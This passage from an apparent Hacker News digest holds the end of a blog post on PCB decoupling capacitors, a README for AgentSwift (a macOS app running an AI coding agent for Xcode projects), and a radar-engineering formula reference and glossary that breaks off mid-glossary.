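At 50 MHz the cap looks like about 0.03 Ω, so even against a modest 1 Ω source impedance the ripple is knocked down by roughly 30 dB, which is the whole trick.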

I think the most instructive thing is to see in real time how a signal gets cleaned up when you add a decoupling capacitor.

##### For this test I went back to an older version of the PCB. Here it’s powered by 5V USB.

##### And here the board is powered by the 8V battery.

I can’t be entirely sure that the lack of a decoupling capacitor is what kills the BMM150 when I go to battery power. After reviewing my schematic, I noticed I don’t have a decoupling cap for the BMI270 either, and that seems to work fine, despite also being rated up to 3.6V. That said, it’s very clear from this experience that it’s good practice to add decoupling capacitors to all ICs on a board. One of the main reasons I’ve undertaken this project is to learn more about the world of PCBs and embedded engineering, so even though this was frustrating in the moment, it’s exactly the kind of mistake I was hoping to run into. I’ve definitely learned something from this experience, and I hope you have as well!


---

## [HN-TITLE] 14. Show HN: AgentSwift – Open-source iOS builder agent

- **Source**: [https://github.com/hpennington/agentswift](https://github.com/hpennington/agentswift)
- **Site**: GitHub
- **Submitter**: hpen (Hacker News)
- **Submitted**: 2026-04-28 01:14 UTC (Hacker News)
- **HN activity**: 13 points · [4 comments](https://news.ycombinator.com/item?id=47929375)
- **Length**: 357 words (~2 min read)
- **Language**: en

[Download AgentSwift-0.1.zip](https://github.com/hpennington/agentswift/raw/refs/heads/main/AgentSwift-0.1.zip). The binary requires the dependencies listed below; setup commands are provided further down.

Dependencies:

- Xcode
- Xcode command line tools
- xcodebuildmcp
- openspec

[![AgentSwift settings panel](https://github.com/hpennington/agentswift/raw/main/screenshot2.png)](https://github.com/hpennington/agentswift/blob/main/screenshot2.png)

[![AgentSwift](https://github.com/hpennington/agentswift/raw/main/screenshot.png)](https://github.com/hpennington/agentswift/blob/main/screenshot.png)

A native macOS app that runs an autonomous AI coding agent for Apple platform development. Describe what you want to build, and AgentSwift uses Claude to discover your project, implement changes, build, run, and validate — without you touching Xcode.

## What it does


AgentSwift drives a multi-phase agentic workflow:

1. **Discover** — Claude inspects your Xcode project structure and schemes
2. **Implement** — edits source files to match your request
3. **Build** — runs xcodebuildmcp to compile
4. **Launch / Validate** — boots the app on a simulator or macOS, runs UI automation to verify behavior
5. **Archive** — marks the task complete

## Requirements


- macOS 26.1+
- Xcode
- Node.js / npm
- An [Anthropic API key](https://console.anthropic.com)

## Dependencies


Install these two CLIs before running the agent:

### xcodebuildmcp


Provides build, launch, and UI automation capabilities for Xcode projects.

```
npm install -g xcodebuildmcp
```

### openspec


Tracks implementation specs across agent sessions.

```
npm install -g @fission-ai/openspec
```

## Setup


1. Build and run the app in Xcode.
2. Open **Settings** and enter your Anthropic API key.
3. Select a **Project Folder** (the root of your Xcode project).
4. Optionally pick an **iOS Simulator** from the dropdown.
5. Type what you want to build and press **Cmd+Return**.

On the first run the agent discovers your project's scheme and simulator target. Subsequent runs skip discovery and go straight to implementation.

## Models


| Model | Use when |
| --- | --- |
| Claude Opus 4.7 | Complex tasks, large codebases |
| Claude Sonnet 4.6 | Faster iteration, lighter tasks |

## Key behaviors


- **Message queuing** — if you send a new message while the agent is running, the latest supersedes earlier ones
- **Build caching** — scheme, project path, and simulator ID are extracted after the first build and reused automatically
- **Error escalation** — the agent attempts one fix on a failure, then surfaces the error to you rather than looping

## Architecture


```
AgentSwiftApp.swift    — app entry point
ContentView.swift      — UI, view models, agentic loop
AnthropicService.swift — Anthropic API client (streaming SSE)
ToolExecutor.swift     — bash / read_file / write_file execution
Item.swift             — chat message model
```

No external Swift dependencies — pure SwiftUI + Foundation.

---

## [HN-TITLE] 15. Radar Laboratory – Interactive Radar Phenomenology

- **Source**: [https://radarlaboratory.com/](https://radarlaboratory.com/)
- **Site**: radarlaboratory.com
- **Author**: Created and maintained by Hunter Bowden.
- **Submitted**: 2026-04-25 14:24 UTC (Hacker News)
- **HN activity**: 36 points · [0 comments](https://news.ycombinator.com/item?id=47901776)
- **Length**: 6.6K words (~29 min read)
- **Language**: en

RADAR LABORATORY QUICK REF · λ=c/f · R=cτ\_d/2 · ΔR=cτ/2 · f\_d=2v\_r/λ · v\_u=PRF·λ/4 · θ=0.886λ/D

THEORY REFERENCE

ALL KEY RADAR FORMULAS — ORGANIZED BY TOPIC — WITH DERIVATIONS AND CONTEXT

01 — Propagation & Frequency

Fundamental Wavelength Relation

The wavelength λ of an electromagnetic wave is inversely proportional to frequency. Every radar formula contains λ — choosing the operating frequency is the first and most consequential design decision.

λ = c / f
c = 3×10⁸ m/s (speed of light)
f = carrier frequency (Hz)

λ — wavelength (m) · f — frequency (Hz) · c — 3×10⁸ m/s

PROPAGATION · FUNDAMENTAL

Radar Band Designations

IEEE letter-band designations define standard operating ranges. Band choice determines resolution, attenuation, target interaction, and hardware constraints.

- L-band: 1–2 GHz, λ ≈ 15–30 cm
- S-band: 2–4 GHz, λ ≈ 7.5–15 cm
- C-band: 4–8 GHz, λ ≈ 3.75–7.5 cm
- X-band: 8–12 GHz, λ ≈ 2.5–3.75 cm
- Ku-band: 12–18 GHz, λ ≈ 1.7–2.5 cm
- Ka-band: 26–40 GHz, λ ≈ 0.75–1.15 cm

BANDS · PROPAGATION

Atmospheric Absorption

Water vapor (H₂O) peaks at 22 GHz (~0.18 dB/km) and 183 GHz. Oxygen (O₂) dominates at 60 GHz (~15 dB/km) and 119 GHz. Atmospheric windows at 35, 77, and 94 GHz are exploited by automotive and military radars.

L\_atm (dB) = α(f) × R\_km
Two-way loss = 2 × α × R\_km
α: dB/km (frequency-dependent)

α — specific attenuation (dB/km) · R\_km — one-way range (km)

PROPAGATION · LOSSES

02 — Range Measurement

Range from Echo Delay

Radar times the two-way travel of a pulse. The round-trip delay τ\_d gives range exactly. Electromagnetic waves travel at c = 3×10⁸ m/s ≈ 150 m/μs (one-way).

R = c · τ\_d / 2
1 μs delay → R = 150 m

τ\_d — round-trip delay (s) · c — 3×10⁸ m/s

RANGE · FUNDAMENTAL

Maximum Unambiguous Range

The radar must receive the previous pulse's echo before firing again. If the PRI is too short, a distant echo arrives after the next transmission and is reported at a false closer range.

R\_u = c / (2 · PRF)
PRI = 1 / PRF (pulse repetition interval)
R\_app = R\_true mod R\_u (folded range)

PRF — pulse repetition frequency (Hz) · PRI — 1/PRF (s)

RANGE · AMBIGUITY
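The two formulas on this card can be sanity-checked in a few lines of Python (the 1 kHz PRF and the 200 km target below are illustrative):

```python
C = 3e8  # speed of light, m/s

def unambiguous_range_m(prf_hz):
    return C / (2 * prf_hz)

def apparent_range_m(true_range_m, prf_hz):
    # echoes from beyond R_u fold back: R_app = R_true mod R_u
    return true_range_m % unambiguous_range_m(prf_hz)

r_u = unambiguous_range_m(1000)        # 150 km
ghost = apparent_range_m(200e3, 1000)  # a 200 km target reports as 50 km
```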

03 — Range Resolution & Pulse Compression

Pulse Width Resolution

Two targets closer than ΔR cannot be separated — their echoes overlap in the receiver. The matched filter output width equals cτ/2, which is why resolution and pulse duration are the same formula.

ΔR = c · τ / 2
τ = 1 μs → ΔR = 150 m
τ = 10 ns → ΔR = 1.5 m

τ — pulse width (s) · ΔR — minimum resolvable separation (m)

RESOLUTION

Pulse Compression (LFM Chirp)

A chirp sweeps frequency across bandwidth B during pulse duration T. The matched filter compresses the pulse to width 1/B, independent of T. This breaks the energy–resolution trade-off.

ΔR\_compressed = c / (2B)
Compression gain: G\_c = B·T
Peak sidelobes: −13.2 dB (rect window), −42.7 dB (Hamming window)

B — chirp bandwidth (Hz) · T — pulse duration (s)

PULSE COMPRESSION · LFM
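The compressed resolution and time-bandwidth gain reduce to one line each; a quick check with an illustrative 50 MHz, 10 μs chirp:

```python
C = 3e8  # speed of light, m/s

def compressed_resolution_m(bandwidth_hz):
    # resolution depends only on swept bandwidth, not pulse length
    return C / (2 * bandwidth_hz)

def compression_gain(bandwidth_hz, pulse_s):
    # time-bandwidth product B*T
    return bandwidth_hz * pulse_s

dr = compressed_resolution_m(50e6)  # 3 m from a 50 MHz chirp
g = compression_gain(50e6, 10e-6)   # BT = 500
```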

Matched Filter SNR

The matched filter is optimal — it maximizes SNR for any given waveform. The output SNR depends only on the signal energy E and noise spectral density N₀, not on pulse shape.

SNR\_out = 2E / N₀
E = Pt · τ (pulse energy)
N₀ = k\_B · T\_sys · F (noise density)

E — signal energy (J) · N₀ — noise spectral density (W/Hz)

MATCHED FILTER · SNR

04 — Doppler & Velocity

Doppler Frequency Shift

A moving target compresses (approaching) or stretches (receding) the reflected wavefront, shifting the echo frequency by f\_d. Positive Doppler = closing, negative = opening.

f\_d = 2 · v\_r / λ = 2 · v\_r · f\_c / c
v\_r = f\_d · λ / 2 (velocity from Doppler)
v\_r = v · cos(θ) (radial component)

v\_r — radial velocity (m/s) · θ — angle from boresight

DOPPLER · VELOCITY

Maximum Unambiguous Velocity

The radar samples echo phase once per PRI. The Nyquist limit for phase sampling is π per sample; a target exceeding v\_u is aliased to a wrong (lower) apparent velocity. This is the Doppler counterpart of range ambiguity.

v\_u = PRF · λ / 4
Phase advance per PRI: Δφ = π · v\_r / v\_u
At v\_r = v\_u: Δφ = π (Nyquist limit)
Aliased velocity: v\_app = v\_r mod v\_u

v\_u — max unambiguous velocity (m/s)

VELOCITY · AMBIGUITY
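Following the card's folding formula, a short sketch (the 10 kHz PRF and 3 cm X-band wavelength are illustrative values):

```python
def unambiguous_velocity_ms(prf_hz, wavelength_m):
    return prf_hz * wavelength_m / 4

def apparent_velocity_ms(v_r, prf_hz, wavelength_m):
    # fold per the card's v_app = v_r mod v_u
    return v_r % unambiguous_velocity_ms(prf_hz, wavelength_m)

v_u = unambiguous_velocity_ms(10e3, 0.03)        # 75 m/s
v_app = apparent_velocity_ms(100.0, 10e3, 0.03)  # 100 m/s aliases to 25 m/s
```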

05 — PRF & The Range-Doppler Ambiguity

Ambiguity Product — Fixed by Physics

PRF simultaneously sets both R\_u and v\_u in opposite directions. Their product is fixed by the carrier frequency alone — independent of PRF. No single PRF can simultaneously maximize both.

R\_u · v\_u = c² / (8 · f\_c) = λ · c / 8 (in terms of wavelength)
Product is CONSTANT for a given frequency.

f\_c — carrier frequency (Hz) · invariant under PRF changes

PRF · AMBIGUITY · FUNDAMENTAL
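The invariance is easy to verify numerically: sweep the PRF at a fixed carrier (10 GHz below, illustrative) and the product R\_u·v\_u does not move.

```python
C = 3e8  # speed of light, m/s

def ambiguity_product(prf_hz, f_c_hz):
    lam = C / f_c_hz
    r_u = C / (2 * prf_hz)          # unambiguous range
    v_u = prf_hz * lam / 4          # unambiguous velocity
    return r_u * v_u                # should equal c^2 / (8 f_c)

p1 = ambiguity_product(1e3, 10e9)   # low PRF
p2 = ambiguity_product(50e3, 10e9)  # high PRF, same product
```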

Staggered PRF — Resolving Ambiguities

Transmitting alternating PRFs with ratio p:q (p, q coprime) moves blind speeds and ghosted ranges. The Chinese Remainder Theorem extends unambiguous intervals to lcm(R\_u1, R\_u2) in range and lcm(v\_u1, v\_u2) in velocity.

R\_u\_stag = lcm(R\_u1, R\_u2)
v\_u\_stag = lcm(v\_u1, v\_u2)
Choose PRF ratio p/q where gcd(p,q) = 1

PRF1, PRF2 — staggered pulse rates · p, q — coprime integers

PRF · STAGGERED

06 — Antenna & Beam

Beamwidth

A uniformly illuminated aperture of width D produces a sinc² beam pattern. The 3 dB (half-power) beamwidth in radians is 0.886λ/D. It is always the ratio λ/D that matters — not D or λ independently.

θ\_3dB ≈ 0.886 · λ / D (radians)
θ\_3dB ≈ 50.8 · λ / D (degrees)
Angular resolution: δ\_az = R · θ\_3dB

D — aperture width (m) · R — range (m) · δ\_az — cross-range resolution

ANTENNA · BEAMWIDTH

Antenna Gain

Gain G is the ratio of peak radiated intensity to that of an isotropic radiator at the same total power. For a uniformly illuminated aperture, G is proportional to A/λ². Aperture efficiency η accounts for non-uniform illumination (typically 0.6–0.8).

G = η · 4π · A / λ²
G = 4π · A\_eff / λ² (A\_eff = η·A)
G\_dBi = 10·log₁₀(G)

A — physical aperture area (m²) · η — aperture efficiency · A\_eff — effective area

ANTENNA · GAIN

Phased Array — Steering & Grating Lobes

A progressive phase shift φ\_n steers the main beam to angle θ\_s. Element spacing d must satisfy d ≤ λ/2 to push grating lobes outside the visible hemisphere. Violating this creates ambiguous returns at grating lobe angles.

Steering phase: φ\_n = n·2π(d/λ)·sin(θ\_s)
Array factor: |AF|² = sin²(Nψ/2)/sin²(ψ/2)
ψ = 2π(d/λ)(sinθ − sinθ\_s)
Grating lobe: sin(θ\_g) = sin(θ\_s) ± nλ/d
Condition for no grating lobe: d ≤ λ/2

BEAMFORMING · PHASED ARRAY
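The grating-lobe condition can be checked by enumerating sin(θ\_g) = sin(θ\_s) ± n·λ/d and keeping only real angles; the spacings and steering angles below are illustrative:

```python
import math

def grating_lobes_deg(d_over_lambda, steer_deg, n_max=5):
    """Angles where sin(theta_g) = sin(theta_s) +/- n/(d/lambda)
    stays inside [-1, 1], i.e. lobes in visible space."""
    s0 = math.sin(math.radians(steer_deg))
    lobes = []
    for n in range(1, n_max + 1):
        for sign in (+1, -1):
            s = s0 + sign * n / d_over_lambda
            if -1.0 <= s <= 1.0:
                lobes.append(math.degrees(math.asin(s)))
    return sorted(lobes)

# half-wavelength spacing at broadside: no grating lobes
clean = grating_lobes_deg(0.5, 0.0)
# one-wavelength spacing steered to 30 deg: a lobe enters at -30 deg
dirty = grating_lobes_deg(1.0, 30.0)
```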

07 — Detection Theory

Hypothesis Testing

Every range cell is tested against two hypotheses: H₀ (noise only) vs H₁ (target + noise). The threshold T sets the trade-off between false alarm probability Pfa and detection probability Pd. No threshold can eliminate both errors simultaneously — the distributions always overlap.

H₀: p(x) = N(0, σ\_n²) \[Gaussian model]
H₁: p(x) = N(A\_s, σ\_n²)
Pfa = P(x > T | H₀) = Q(T/σ\_n)
Pd = P(x > T | H₁) = Q((T−A\_s)/σ\_n)

DETECTION · NEYMAN-PEARSON

Rayleigh/Rice Model (Envelope Detection)

Real radar receivers use envelope detection, making the noise Rayleigh-distributed (not Gaussian). The Marcum Q₁ function gives Pd for a non-fluctuating target. This is a better model for envelope-detected radar returns. The right model still depends on where in the receiver chain you place the detector and test statistic.

H₀ (noise only): Rayleigh(σ\_n)
Pfa = exp(−T²/2σ\_n²)
H₁ (target+noise): Rice(A\_s, σ\_n)
Pd = Q₁(A\_s/σ\_n, T/σ\_n) \[Marcum Q]
Swerling 1: Pd = Pfa^(1/(1+SNR))

DETECTION · RAYLEIGH · SWERLING
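Two of these expressions evaluate or invert in closed form; a small sketch (σ\_n = 1 and the +20 dB SNR are illustrative choices):

```python
import math

def rayleigh_threshold(pfa, sigma_n=1.0):
    # invert Pfa = exp(-T^2 / (2 sigma_n^2)) for the threshold T
    return sigma_n * math.sqrt(-2.0 * math.log(pfa))

def swerling1_pd(pfa, snr_linear):
    # fluctuating (Swerling 1) target: Pd = Pfa^(1/(1+SNR))
    return pfa ** (1.0 / (1.0 + snr_linear))

t = rayleigh_threshold(1e-6)        # ~5.26 sigma for Pfa = 1e-6
pd = swerling1_pd(1e-6, 100.0)      # ~0.87 at +20 dB SNR
```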

Coherent Integration

Summing N pulses coherently (phase-aligned) improves SNR by exactly N (linear), or 10 log₁₀(N) dB. This is the fundamental lever for extending detection range without increasing transmit power.

SNR\_coh = N · SNR\_single
SNR\_improvement = 10·log₁₀(N) dB
Range extension ∝ N^(1/4)
Example: N=16 → +12 dB → +100% range

INTEGRATION · DETECTION

08 — CFAR — Constant False Alarm Rate

CA-CFAR Threshold

Cell-Averaging CFAR estimates local noise power from N reference cells surrounding each cell under test (CUT). The threshold scales with the noise estimate, keeping Pfa constant as noise level changes. Guard cells prevent target energy from contaminating the noise estimate.

T = α · mean(reference cell powers)
α = N · (Pfa^(−1/N) − 1)
Guard cells: typically 2–4 each side
Reference cells: typically N = 16–32

α — CFAR scaling factor · N — number of reference cells

CFAR · DETECTION
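A minimal CA-CFAR over a synthetic 1-D power profile, using the card's α formula (window sizes, the exponential noise model, and the injected target are all illustrative):

```python
import random

def ca_cfar(power, n_ref=16, n_guard=2, pfa=1e-3):
    """Cell-averaging CFAR over a 1-D power profile.
    Returns indices where the cell under test exceeds alpha * local mean."""
    half = n_ref // 2
    alpha = n_ref * (pfa ** (-1.0 / n_ref) - 1.0)
    hits = []
    for i in range(half + n_guard, len(power) - half - n_guard):
        left = power[i - n_guard - half : i - n_guard]
        right = power[i + n_guard + 1 : i + n_guard + half + 1]
        noise = sum(left + right) / n_ref   # guard cells excluded
        if power[i] > alpha * noise:
            hits.append(i)
    return hits

random.seed(0)
# unit-mean exponential noise (square-law detected) with one strong target
profile = [random.expovariate(1.0) for _ in range(100)]
profile[50] += 100.0
detections = ca_cfar(profile)
```

The threshold rides the local noise estimate, so the strong cell at bin 50 pops out while the noise floor stays (on average) below α times its own mean.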

CFAR Variants

CA-CFAR fails at clutter edges and in target-rich environments. Variants address specific failure modes at a cost in detection performance.

CA-CFAR: mean of all reference cells
GO-CFAR: max(left mean, right mean) \[clutter edges]
SO-CFAR: min(left mean, right mean) \[multiple targets]
OS-CFAR: k-th order statistic \[non-Rayleigh clutter]

CFAR · DETECTION

09 — System Parameters & Radar Range Equation

Receiver Noise Power

Thermal noise sets the absolute detection floor. The noise figure F quantifies the excess noise added by the receiver chain above the thermal minimum. The first amplifier (LNA) dominates the cascade.

P\_noise = k\_B · T\_sys · B
k\_B = 1.38×10⁻²³ J/K (Boltzmann)
T\_sys = T₀(F−1) + T\_ant \[system temp]
T₀ = 290 K (standard reference)
F\_cascade = F₁ + (F₂−1)/G₁ + ... \[Friis]

k\_B — Boltzmann constant · T\_sys — system noise temperature (K) · B — bandwidth (Hz)

NOISE · RECEIVER

The Radar Range Equation

The central equation of radar design. Every parameter in the RRE has been covered in the curriculum. The R⁴ dependence means doubling range requires 16× more power, or 4× more antenna gain.

SNR = (Pt · G² · λ² · σ) / ((4π)³ · R⁴ · k\_B · T₀ · B · F · L)
R\_max = \[ Pt·G²·λ²·σ / ((4π)³·SNR\_min·kTBFL) ]^(1/4)
In dB: SNR\_dB = Pt\_dBW + 2G\_dBi + 20log(λ) + σ\_dBsm − 30·log(4π) − 40log(R\_m) − 10log(kTBF) − L\_dB

Pt — transmit power (W) · G — antenna gain · σ — RCS (m²) · L — losses (linear)

RANGE EQUATION · FUNDAMENTAL
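A sketch of the equation in linear units; every parameter value below is illustrative, and the R⁴ term shows up as the ~12 dB cost of doubling range:

```python
import math

K_B = 1.38e-23  # Boltzmann constant, J/K

def snr_db(pt_w, gain_lin, wavelength_m, rcs_m2, range_m,
           bandwidth_hz, noise_figure_lin=2.0, loss_lin=2.0, t0_k=290.0):
    """Point-target SNR from the radar range equation, linear inputs."""
    num = pt_w * gain_lin**2 * wavelength_m**2 * rcs_m2
    den = ((4 * math.pi)**3 * range_m**4
           * K_B * t0_k * bandwidth_hz * noise_figure_lin * loss_lin)
    return 10 * math.log10(num / den)

near = snr_db(1e3, 1e3, 0.03, 1.0, 10e3, 1e6)  # 1 m^2 target at 10 km
far = snr_db(1e3, 1e3, 0.03, 1.0, 20e3, 1e6)   # same target at 20 km
```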

Radar Cross Section (RCS)

RCS is the effective scattering area of a target — the area of an equivalent isotropic reflector producing the same power density back at the radar. Highly aspect-angle and frequency dependent.

σ = lim(R→∞) 4πR² · |E\_s|²/|E\_i|²
Metallic sphere (optical): σ = πr²
Flat plate (normal incidence): σ = 4πA²/λ²
σ\_dBsm = 10·log₁₀(σ) \[dB sq. meters]

RCS · TARGET

10 — Clutter & MTI

Clutter RCS

Ground and sea clutter are distributed targets characterized by the normalized clutter cross-section σ⁰ (sigma-naught) in dB. The total clutter RCS in one range-azimuth cell depends on the cell geometry.

σ\_c = σ⁰ · A\_c
A\_c = (c·τ/2) · R · θ\_az \[range-azimuth cell]
SCR = σ\_target / σ\_c \[signal-to-clutter]
Typical σ⁰: farmland −25 dB, urban −10 dB

CLUTTER

MTI Canceller

Moving Target Indication subtracts consecutive pulse returns. Ground clutter (Doppler ≈ 0) cancels; moving targets survive. The improvement factor (IF) measures cancellation quality.

Single delay: y\[n] = x\[n] − x\[n−1] → H(z) = 1−z⁻¹
Double delay: y\[n] = x\[n] − 2x\[n−1] + x\[n−2]
Improvement Factor: IF = SCR\_out / SCR\_in
Blind speeds: v\_b = n·PRF·λ/2, n = 1, 2, 3…

MTI · CLUTTER
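The single-delay canceller is one line of code; on synthetic pulse-to-pulse samples, constant clutter nulls exactly while a Doppler-shifted target survives (the 0.1-cycle-per-PRI phase rate is illustrative):

```python
import math

def single_delay_canceller(x):
    # y[n] = x[n] - x[n-1], i.e. H(z) = 1 - z^-1
    return [x[n] - x[n - 1] for n in range(1, len(x))]

# stationary clutter: identical echo each PRI -> cancels to zero
clutter = [1.0] * 8
# moving target: phase advances every PRI, so consecutive samples differ
target = [math.cos(2 * math.pi * 0.1 * n) for n in range(8)]

c_out = single_delay_canceller(clutter)
t_out = single_delay_canceller(target)
```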

11 — FMCW Radar

Beat Frequency & Range

FMCW mixes transmit and receive signals to produce a constant beat frequency proportional to target range. A Doppler component also appears as a frequency offset between up-sweep and down-sweep measurements.

Beat frequency: f\_b = 2·R·B / (c·T)
Range from beat: R = f\_b·c·T / (2·B)
Range resolution: ΔR = c/(2B)
Velocity: v\_r from phase difference between sweeps

B — sweep bandwidth (Hz) · T — sweep period (s) · f\_b — beat frequency

FMCW · CW RADAR
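The beat and range formulas are inverses of each other, as a quick round trip shows (the 150 MHz sweep over 1 ms and the 30 m target are illustrative):

```python
C = 3e8  # speed of light, m/s

def beat_frequency_hz(range_m, sweep_bw_hz, sweep_period_s):
    return 2 * range_m * sweep_bw_hz / (C * sweep_period_s)

def range_from_beat_m(f_beat_hz, sweep_bw_hz, sweep_period_s):
    return f_beat_hz * C * sweep_period_s / (2 * sweep_bw_hz)

fb = beat_frequency_hz(30.0, 150e6, 1e-3)   # ~30 kHz beat for a 30 m target
r = range_from_beat_m(fb, 150e6, 1e-3)      # round-trips back to 30 m
```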

12 — STAP & MIMO

STAP Optimal Weights

Space-Time Adaptive Processing jointly nulls clutter and interference in both angle and Doppler. The optimal weight vector maximizes SINR by whitening the interference covariance before steering.

w\_opt = R⁻¹·s / (s^H·R⁻¹·s)
R — MN×MN space-time covariance matrix
s — MN×1 space-time steering vector
Training requirement: K ≥ 2·M·N (RMB rule)

STAP · ADAPTIVE

MIMO Virtual Array

MIMO radar transmits orthogonal waveforms from N\_t elements and separates them at N\_r receive elements, synthesizing N\_t×N\_r virtual channels. The virtual aperture has N\_t times the angular resolution of a conventional phased array.

Virtual elements: N\_v = N\_t × N\_r
Virtual aperture: L\_v = N\_t · N\_r · d
Beamwidth: θ ≈ λ / L\_v
DoF gain vs phased array: N\_t times more

MIMO · VIRTUAL ARRAY

13 — Target Tracking

Kalman Filter

The Kalman filter is the minimum mean-square-error estimator for linear Gaussian systems. Each cycle alternates between prediction (propagating uncertainty forward) and update (correcting with new measurement).

PREDICT:
x\_{k|k-1} = F·x\_{k-1}
P\_{k|k-1} = F·P·Fᵀ + Q
UPDATE:
y\_k = z\_k − H·x\_{k|k-1} \[innovation]
S = H·P·Hᵀ + R \[innovation cov]
K = P·Hᵀ·S⁻¹ \[Kalman gain]
x\_k = x\_{k|k-1} + K·y\_k
P\_k = (I−K·H)·P\_{k|k-1}

Q — process noise cov · R — measurement noise cov · F — state transition · H — observation matrix

TRACKING · KALMAN
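In the scalar case (F = H = 1, a random-walk state) the predict/update cycle collapses to a few lines. This is a sketch with illustrative noise covariances, not the general matrix form:

```python
def kalman_1d(measurements, q=1e-4, r=1.0, x0=0.0, p0=100.0):
    """Scalar Kalman filter: F = H = 1 (random-walk state model)."""
    x, p = x0, p0
    estimates = []
    for z in measurements:
        p = p + q                # predict: uncertainty grows by Q
        k = p / (p + r)          # Kalman gain from innovation covariance
        x = x + k * (z - x)      # update: correct with the innovation
        p = (1 - k) * p          # posterior covariance
        estimates.append(x)
    return estimates

# noisy range readings around a true value of 5.0 (made-up data)
est = kalman_1d([5.1, 4.9, 5.0, 5.2, 4.8, 5.0])
```

Note how the gain starts near 1 (large prior uncertainty, trust the measurement) and shrinks as the covariance converges.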

Tracking Gate & Data Association

An ellipsoidal validation gate selects candidate measurements for each track. The Mahalanobis distance determines whether a measurement falls within the predicted uncertainty ellipsoid.

Gate test: d² = yᵀ·S⁻¹·y ≤ χ²\_{n,P\_g}
S = H·P·Hᵀ + R \[innovation covariance]
P\_g — gate probability (typically 0.95–0.999)
χ²\_{n,P\_g} — chi-squared threshold (n = meas. dim.)

TRACKING · DATA ASSOCIATION
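For a 2-D measurement at P\_g = 0.95 the χ² threshold is 5.991, and the gate test is just a quadratic form; the innovations and covariance below are illustrative:

```python
def mahalanobis2_2d(y, s):
    """d^2 = y^T S^-1 y for a 2-D innovation y and 2x2 covariance S."""
    (a, b), (c, d) = s
    det = a * d - b * c
    inv = [[d / det, -b / det], [-c / det, a / det]]   # 2x2 inverse
    sy = [inv[0][0] * y[0] + inv[0][1] * y[1],
          inv[1][0] * y[0] + inv[1][1] * y[1]]
    return y[0] * sy[0] + y[1] * sy[1]

CHI2_2DOF_95 = 5.991  # chi-squared threshold, 2 dof, P_g = 0.95

S = [[4.0, 0.0], [0.0, 4.0]]                 # innovation covariance
d2_near = mahalanobis2_2d([1.0, 1.0], S)     # 0.5 -> inside the gate
d2_far = mahalanobis2_2d([10.0, 0.0], S)     # 25.0 -> outside the gate
```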

GLOSSARY

RADAR ENGINEERING TERMS — ALPHABETICAL — 57 DEFINITIONS

SEARCH TERMS

A

A-Scope

A radar display that plots received signal amplitude (vertical axis) versus range (horizontal axis). Each target appears as a spike at its corresponding range. The A-scope is the most fundamental radar display and the primary visualization in Modules 02–03.

Ambiguity Function

A 2D function χ(τ, f\_d) that describes the matched filter output for a waveform as a function of both delay (range) and Doppler offset (velocity). The ambiguity function fully characterizes the range-Doppler resolution and sidelobe structure of any waveform — an ideal thumbtack (narrow spike at the origin) is the design goal.

|χ(τ,f\_d)|² = |∫s(t)·s\*(t−τ)·e^(j2πf\_d·t)dt|²

Antenna Aperture

The physical collecting area of an antenna, measured in m². Larger aperture means higher gain and narrower beamwidth for a given wavelength. The effective aperture A\_eff = η·A accounts for illumination taper and feed losses. The relationship G = 4πA\_eff/λ² connects aperture directly to gain.

G = 4π · A\_eff / λ²

Atmospheric Attenuation

The absorption and scattering of radar energy by atmospheric gases, primarily water vapor (H₂O) and oxygen (O₂). Expressed in dB/km, it varies strongly with frequency. At X-band (~10 GHz) attenuation is ~0.01 dB/km; at 60 GHz it reaches 15 dB/km due to oxygen absorption. Both one-way and two-way losses must be budgeted in the Radar Range Equation.

B

Bandwidth

The range of frequencies occupied by a radar signal. For a simple pulse, bandwidth ≈ 1/τ. For a chirp, bandwidth B is the frequency sweep extent and directly sets compressed range resolution ΔR = c/(2B). Wider bandwidth gives finer resolution but requires wider receiver filters (more noise). Bandwidth also sets the noise power floor: P\_noise = k\_B·T·B.

ΔR = c / (2B)
P\_noise = k\_B·T·B

Beamforming

The process of combining signals from multiple antenna elements with appropriate phase shifts (and optionally amplitude weights) to produce a directional beam. Beamforming can be implemented in hardware (analog beamforming), digitally after ADC (digital beamforming), or in hybrid architectures. Digital beamforming enables simultaneous multiple beams from the same array.

Beamwidth

The angular width of the main beam of an antenna pattern, typically measured between the half-power (−3 dB) points. For a uniformly illuminated rectangular aperture: θ\_3dB ≈ 0.886λ/D radians. Narrower beamwidth means better angular resolution but requires a larger aperture or higher frequency. The first sidelobe level for a uniform aperture is −13.2 dB below the main lobe peak.

θ\_3dB ≈ 0.886 λ/D (rad) ≈ 50.8 λ/D (deg)

Blind Speed

A target radial velocity at which the MTI canceller erroneously cancels the moving target along with stationary clutter. Blind speeds occur when the target's phase change per PRI is a multiple of 2π, making it appear stationary. The first blind speed is v\_b = PRF·λ/2. Staggered PRF moves blind speeds to different velocities, effectively eliminating most of them in practice.

v\_blind = n · PRF · λ/2, n = 1, 2, 3…

Burn-through Range

The maximum range at which a target's true echo exceeds the jamming noise level, allowing detection despite active noise jamming. Below burn-through range, the radar can detect the target; beyond it, jamming dominates. Lower RCS targets have shorter burn-through ranges. Increasing transmit power, coherent integration, or sidelobe cancellation all extend burn-through range.

C

CA-CFAR Cell-Averaging Constant False Alarm Rate

The most widely used CFAR algorithm. For each range cell under test, it averages the power in N surrounding reference cells and multiplies by a threshold factor α. The threshold rises where noise is high and drops where it is quiet, keeping Pfa constant regardless of noise level. Guard cells adjacent to the CUT prevent the target's own energy from inflating the noise estimate.

T = α · mean(ref cells)
α = N·(Pfa^(−1/N) − 1)

CFAR Constant False Alarm Rate

A class of detection algorithms that maintain a constant Pfa regardless of changes in background noise or clutter level, by adaptively setting the detection threshold based on the local environment. The alternative — a fixed threshold — has a Pfa that varies wildly with noise level, producing either excessive false alarms in high-noise regions or missed detections in quiet regions.

Chirp

See LFM Chirp. A waveform whose instantaneous frequency sweeps linearly from f₀ to f₀+B over the pulse duration T. Used in pulse compression to achieve fine range resolution (∝ 1/B) while transmitting a long high-energy pulse (∝ T).

Clutter

Any unwanted radar return that is not the target of interest. Ground clutter (land and sea returns), weather clutter (rain, hail), chaff, and birds all produce clutter. Unlike thermal noise (spectrally flat), clutter has spatial and Doppler structure that radar signal processing can exploit. The signal-to-clutter ratio (SCR) determines detectability in clutter-limited environments.

Coherent Integration

The process of summing multiple pulse returns with phase alignment before detection. Because the target signal adds coherently (amplitudes add) while noise adds incoherently (power adds), coherent integration of N pulses improves SNR by N linear (10 log₁₀ N dB). This is fundamentally different from incoherent integration (√N gain in amplitude) and is the primary tool for extending detection range.

SNR\_coh = N · SNR\_single

D

Data Association

